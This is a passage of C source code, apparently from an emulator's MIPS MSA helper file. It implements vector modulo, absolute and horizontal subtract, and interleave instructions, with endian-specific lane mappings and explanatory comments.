helper_msa_mod_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_mod_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_mod_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_mod_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_mod_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_mod_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_mod_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_mod_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_mod_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_mod_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_mod_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_mod_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_mod_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_mod_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_mod_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_mod_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_mod_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Multiply * ------------ * * +---------------+----------------------------------------------------------+ * | MADDV.B | Vector Multiply and Add (byte) | * | MADDV.H | Vector Multiply and Add (halfword) | * | MADDV.W | Vector Multiply and Add (word) | * | MADDV.D | Vector Multiply and Add (doubleword) | * | MSUBV.B | Vector Multiply and Subtract (byte) | * | MSUBV.H | Vector Multiply and Subtract (halfword) | * | MSUBV.W | Vector Multiply and Subtract (word) | * | MSUBV.D | Vector Multiply and Subtract (doubleword) | * | MULV.B | Vector Multiply (byte) | * | MULV.H | Vector Multiply (halfword) | * | MULV.W | Vector Multiply (word) | * | MULV.D | Vector Multiply (doubleword) | * +---------------+----------------------------------------------------------+ */ /* TODO: insert Int Multiply group helpers here */ /* * Int Subtract * ------------ * * 
+---------------+----------------------------------------------------------+ * | ASUB_S.B | Vector Absolute Values of Signed Subtract (byte) | * | ASUB_S.H | Vector Absolute Values of Signed Subtract (halfword) | * | ASUB_S.W | Vector Absolute Values of Signed Subtract (word) | * | ASUB_S.D | Vector Absolute Values of Signed Subtract (doubleword) | * | ASUB_U.B | Vector Absolute Values of Unsigned Subtract (byte) | * | ASUB_U.H | Vector Absolute Values of Unsigned Subtract (halfword) | * | ASUB_U.W | Vector Absolute Values of Unsigned Subtract (word) | * | ASUB_U.D | Vector Absolute Values of Unsigned Subtract (doubleword) | * | HSUB_S.H | Vector Signed Horizontal Subtract (halfword) | * | HSUB_S.W | Vector Signed Horizontal Subtract (word) | * | HSUB_S.D | Vector Signed Horizontal Subtract (doubleword) | * | HSUB_U.H | Vector Unsigned Horizontal Subtract (halfword) | * | HSUB_U.W | Vector Unsigned Horizontal Subtract (word) | * | HSUB_U.D | Vector Unsigned Horizontal Subtract (doubleword) | * | SUBS_S.B | Vector Signed Saturated Subtract (of Signed) (byte) | * | SUBS_S.H | Vector Signed Saturated Subtract (of Signed) (halfword) | * | SUBS_S.W | Vector Signed Saturated Subtract (of Signed) (word) | * | SUBS_S.D | Vector Signed Saturated Subtract (of Signed) (doubleword)| * | SUBS_U.B | Vector Unsigned Saturated Subtract (of Uns.) (byte) | * | SUBS_U.H | Vector Unsigned Saturated Subtract (of Uns.) (halfword) | * | SUBS_U.W | Vector Unsigned Saturated Subtract (of Uns.) (word) | * | SUBS_U.D | Vector Unsigned Saturated Subtract (of Uns.) (doubleword)| * | SUBSUS_U.B | Vector Uns. Sat. Subtract (of S. from Uns.) (byte) | * | SUBSUS_U.H | Vector Uns. Sat. Subtract (of S. from Uns.) (halfword) | * | SUBSUS_U.W | Vector Uns. Sat. Subtract (of S. from Uns.) (word) | * | SUBSUS_U.D | Vector Uns. Sat. Subtract (of S. from Uns.) (doubleword) | * | SUBSUU_S.B | Vector Signed Saturated Subtract (of Uns.) (byte) | * | SUBSUU_S.H | Vector Signed Saturated Subtract (of Uns.) (halfword) | * | SUBSUU_S.W | Vector Signed Saturated Subtract (of Uns.) (word) | * | SUBSUU_S.D | Vector Signed Saturated Subtract (of Uns.) (doubleword) | * | SUBV.B | Vector Subtract (byte) | * | SUBV.H | Vector Subtract (halfword) | * | SUBV.W | Vector Subtract (word) | * | SUBV.D | Vector Subtract (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_asub_s_df(uint32_t df, int64_t arg1, int64_t arg2) { /* signed compare */ return (arg1 < arg2) ? 
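/*
 * The absolute difference is formed at 64-bit width and truncated on the
 * per-element store: ASUB_S.B with arg1 = -100 and arg2 = 100 yields
 * 200 = 0xc8, so the byte lane holds the correct unsigned magnitude even
 * though it reads back as -56 when interpreted as signed.
 */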
(uint64_t)(arg2 - arg1) : (uint64_t)(arg1 - arg2); } void helper_msa_asub_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_asub_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_asub_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_asub_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_asub_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_asub_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_asub_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_asub_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_asub_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_asub_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_asub_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_asub_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_asub_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_asub_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_asub_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_asub_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_asub_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_asub_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_asub_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_asub_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_asub_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_asub_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_asub_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_asub_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_asub_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_asub_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_asub_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_asub_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_asub_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_asub_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_asub_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_asub_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_asub_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_asub_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_asub_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); /* unsigned compare */ return (u_arg1 < u_arg2) ? 
(uint64_t)(u_arg2 - u_arg1) : (uint64_t)(u_arg1 - u_arg2); } void helper_msa_asub_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_asub_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_asub_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_asub_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_asub_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_asub_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_asub_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_asub_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_asub_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_asub_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_asub_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_asub_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_asub_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_asub_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_asub_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_asub_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_asub_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_asub_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_asub_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_asub_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_asub_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_asub_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_asub_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_asub_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_asub_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_asub_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_asub_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_asub_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_asub_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_asub_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_asub_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_asub_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_asub_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_asub_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* TODO: insert the rest of Int Subtract group helpers here */ static inline int64_t msa_hsub_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return SIGNED_ODD(arg1, df) - SIGNED_EVEN(arg2, df); } void helper_msa_hsub_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hsub_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hsub_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hsub_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hsub_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hsub_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hsub_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hsub_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hsub_s_df(DF_HALF, pws->h[7], 
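/*
 * Horizontal subtract works on pairs inside each element: for DF_HALF
 * the result is the signed high (odd) byte of the ws element minus the
 * signed low (even) byte of the wt element, using the SIGNED_ODD /
 * SIGNED_EVEN extraction macros defined earlier in this file.
 */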
pwt->h[7]); } void helper_msa_hsub_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hsub_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hsub_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hsub_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hsub_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hsub_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hsub_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hsub_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_hsub_u_df(uint32_t df, int64_t arg1, int64_t arg2) { return UNSIGNED_ODD(arg1, df) - UNSIGNED_EVEN(arg2, df); } void helper_msa_hsub_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hsub_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hsub_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hsub_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hsub_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hsub_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hsub_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hsub_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hsub_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_hsub_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hsub_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hsub_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hsub_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hsub_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hsub_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hsub_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hsub_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Interleave * ---------- * * +---------------+----------------------------------------------------------+ * | ILVEV.B | Vector Interleave Even (byte) | * | ILVEV.H | Vector Interleave Even (halfword) | * | ILVEV.W | Vector Interleave Even (word) | * | ILVEV.D | Vector Interleave Even (doubleword) | * | ILVOD.B | Vector Interleave Odd (byte) | * | ILVOD.H | Vector Interleave Odd (halfword) | * | ILVOD.W | Vector Interleave Odd (word) | * | ILVOD.D | Vector Interleave Odd (doubleword) | * | ILVL.B | Vector Interleave Left (byte) | * | ILVL.H | Vector Interleave Left (halfword) | * | ILVL.W | Vector Interleave Left (word) | * | ILVL.D | Vector Interleave Left (doubleword) | * | ILVR.B | Vector Interleave Right (byte) | * | ILVR.H | Vector Interleave Right (halfword) | * | ILVR.W | Vector Interleave Right (word) | * | ILVR.D | Vector Interleave Right (doubleword) | * +---------------+----------------------------------------------------------+ */ void helper_msa_ilvev_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = 
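/*
 * For ILVEV.B in little-endian lane order, the even-indexed bytes of wt
 * land in the even destination lanes and the even-indexed bytes of ws in
 * the odd ones. A minimal host-side sketch of that lane mapping (kept
 * out of the build; ws_v, wt_v and wd_v are hypothetical register
 * images, not names used elsewhere in this file):
 */
#if 0
static void check_ilvev_b_lanes(const wr_t *ws_v, const wr_t *wt_v,
                                const wr_t *wd_v)
{
    int i;
    for (i = 0; i < 8; i++) {
        /* wd.b[2i] comes from wt, wd.b[2i+1] from ws */
        assert(wd_v->b[2 * i] == wt_v->b[2 * i]);
        assert(wd_v->b[2 * i + 1] == ws_v->b[2 * i]);
    }
}
#endif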
&(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[8] = pws->b[9]; pwd->b[9] = pwt->b[9]; pwd->b[10] = pws->b[11]; pwd->b[11] = pwt->b[11]; pwd->b[12] = pws->b[13]; pwd->b[13] = pwt->b[13]; pwd->b[14] = pws->b[15]; pwd->b[15] = pwt->b[15]; pwd->b[0] = pws->b[1]; pwd->b[1] = pwt->b[1]; pwd->b[2] = pws->b[3]; pwd->b[3] = pwt->b[3]; pwd->b[4] = pws->b[5]; pwd->b[5] = pwt->b[5]; pwd->b[6] = pws->b[7]; pwd->b[7] = pwt->b[7]; #else pwd->b[15] = pws->b[14]; pwd->b[14] = pwt->b[14]; pwd->b[13] = pws->b[12]; pwd->b[12] = pwt->b[12]; pwd->b[11] = pws->b[10]; pwd->b[10] = pwt->b[10]; pwd->b[9] = pws->b[8]; pwd->b[8] = pwt->b[8]; pwd->b[7] = pws->b[6]; pwd->b[6] = pwt->b[6]; pwd->b[5] = pws->b[4]; pwd->b[4] = pwt->b[4]; pwd->b[3] = pws->b[2]; pwd->b[2] = pwt->b[2]; pwd->b[1] = pws->b[0]; pwd->b[0] = pwt->b[0]; #endif } void helper_msa_ilvev_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[4] = pws->h[5]; pwd->h[5] = pwt->h[5]; pwd->h[6] = pws->h[7]; pwd->h[7] = pwt->h[7]; pwd->h[0] = pws->h[1]; pwd->h[1] = pwt->h[1]; pwd->h[2] = pws->h[3]; pwd->h[3] = pwt->h[3]; #else pwd->h[7] = pws->h[6]; pwd->h[6] = pwt->h[6]; pwd->h[5] = pws->h[4]; pwd->h[4] = pwt->h[4]; pwd->h[3] = pws->h[2]; pwd->h[2] = pwt->h[2]; pwd->h[1] = pws->h[0]; pwd->h[0] = pwt->h[0]; #endif } void helper_msa_ilvev_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[2] = pws->w[3]; pwd->w[3] = pwt->w[3]; pwd->w[0] = pws->w[1]; pwd->w[1] = pwt->w[1]; #else pwd->w[3] = pws->w[2]; pwd->w[2] = pwt->w[2]; pwd->w[1] = pws->w[0]; pwd->w[0] = pwt->w[0]; #endif } void helper_msa_ilvev_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[1] = pws->d[0]; pwd->d[0] = pwt->d[0]; } void helper_msa_ilvod_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[7] = pwt->b[6]; pwd->b[6] = pws->b[6]; pwd->b[5] = pwt->b[4]; pwd->b[4] = pws->b[4]; pwd->b[3] = pwt->b[2]; pwd->b[2] = pws->b[2]; pwd->b[1] = pwt->b[0]; pwd->b[0] = pws->b[0]; pwd->b[15] = pwt->b[14]; pwd->b[14] = pws->b[14]; pwd->b[13] = pwt->b[12]; pwd->b[12] = pws->b[12]; pwd->b[11] = pwt->b[10]; pwd->b[10] = pws->b[10]; pwd->b[9] = pwt->b[8]; pwd->b[8] = pws->b[8]; #else pwd->b[0] = pwt->b[1]; pwd->b[1] = pws->b[1]; pwd->b[2] = pwt->b[3]; pwd->b[3] = pws->b[3]; pwd->b[4] = pwt->b[5]; pwd->b[5] = pws->b[5]; pwd->b[6] = pwt->b[7]; pwd->b[7] = pws->b[7]; pwd->b[8] = pwt->b[9]; pwd->b[9] = pws->b[9]; pwd->b[10] = pwt->b[11]; pwd->b[11] = pws->b[11]; pwd->b[12] = pwt->b[13]; pwd->b[13] = pws->b[13]; pwd->b[14] = pwt->b[15]; pwd->b[15] = pws->b[15]; #endif } void helper_msa_ilvod_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[3] = pwt->h[2]; pwd->h[2] = pws->h[2]; pwd->h[1] = pwt->h[0]; pwd->h[0] = pws->h[0]; pwd->h[7] = 
pwt->h[6]; pwd->h[6] = pws->h[6]; pwd->h[5] = pwt->h[4]; pwd->h[4] = pws->h[4]; #else pwd->h[0] = pwt->h[1]; pwd->h[1] = pws->h[1]; pwd->h[2] = pwt->h[3]; pwd->h[3] = pws->h[3]; pwd->h[4] = pwt->h[5]; pwd->h[5] = pws->h[5]; pwd->h[6] = pwt->h[7]; pwd->h[7] = pws->h[7]; #endif } void helper_msa_ilvod_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[1] = pwt->w[0]; pwd->w[0] = pws->w[0]; pwd->w[3] = pwt->w[2]; pwd->w[2] = pws->w[2]; #else pwd->w[0] = pwt->w[1]; pwd->w[1] = pws->w[1]; pwd->w[2] = pwt->w[3]; pwd->w[3] = pws->w[3]; #endif } void helper_msa_ilvod_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pwt->d[1]; pwd->d[1] = pws->d[1]; } void helper_msa_ilvl_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[7] = pwt->b[15]; pwd->b[6] = pws->b[15]; pwd->b[5] = pwt->b[14]; pwd->b[4] = pws->b[14]; pwd->b[3] = pwt->b[13]; pwd->b[2] = pws->b[13]; pwd->b[1] = pwt->b[12]; pwd->b[0] = pws->b[12]; pwd->b[15] = pwt->b[11]; pwd->b[14] = pws->b[11]; pwd->b[13] = pwt->b[10]; pwd->b[12] = pws->b[10]; pwd->b[11] = pwt->b[9]; pwd->b[10] = pws->b[9]; pwd->b[9] = pwt->b[8]; pwd->b[8] = pws->b[8]; #else pwd->b[0] = pwt->b[8]; pwd->b[1] = pws->b[8]; pwd->b[2] = pwt->b[9]; pwd->b[3] = pws->b[9]; pwd->b[4] = pwt->b[10]; pwd->b[5] = pws->b[10]; pwd->b[6] = pwt->b[11]; pwd->b[7] = pws->b[11]; pwd->b[8] = pwt->b[12]; pwd->b[9] = pws->b[12]; pwd->b[10] = pwt->b[13]; pwd->b[11] = pws->b[13]; pwd->b[12] = pwt->b[14]; pwd->b[13] = pws->b[14]; pwd->b[14] = pwt->b[15]; pwd->b[15] = pws->b[15]; #endif } void helper_msa_ilvl_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[3] = pwt->h[7]; pwd->h[2] = pws->h[7]; pwd->h[1] = pwt->h[6]; pwd->h[0] = pws->h[6]; pwd->h[7] = pwt->h[5]; pwd->h[6] = pws->h[5]; pwd->h[5] = pwt->h[4]; pwd->h[4] = pws->h[4]; #else pwd->h[0] = pwt->h[4]; pwd->h[1] = pws->h[4]; pwd->h[2] = pwt->h[5]; pwd->h[3] = pws->h[5]; pwd->h[4] = pwt->h[6]; pwd->h[5] = pws->h[6]; pwd->h[6] = pwt->h[7]; pwd->h[7] = pws->h[7]; #endif } void helper_msa_ilvl_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[1] = pwt->w[3]; pwd->w[0] = pws->w[3]; pwd->w[3] = pwt->w[2]; pwd->w[2] = pws->w[2]; #else pwd->w[0] = pwt->w[2]; pwd->w[1] = pws->w[2]; pwd->w[2] = pwt->w[3]; pwd->w[3] = pws->w[3]; #endif } void helper_msa_ilvl_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pwt->d[1]; pwd->d[1] = pws->d[1]; } void helper_msa_ilvr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = 
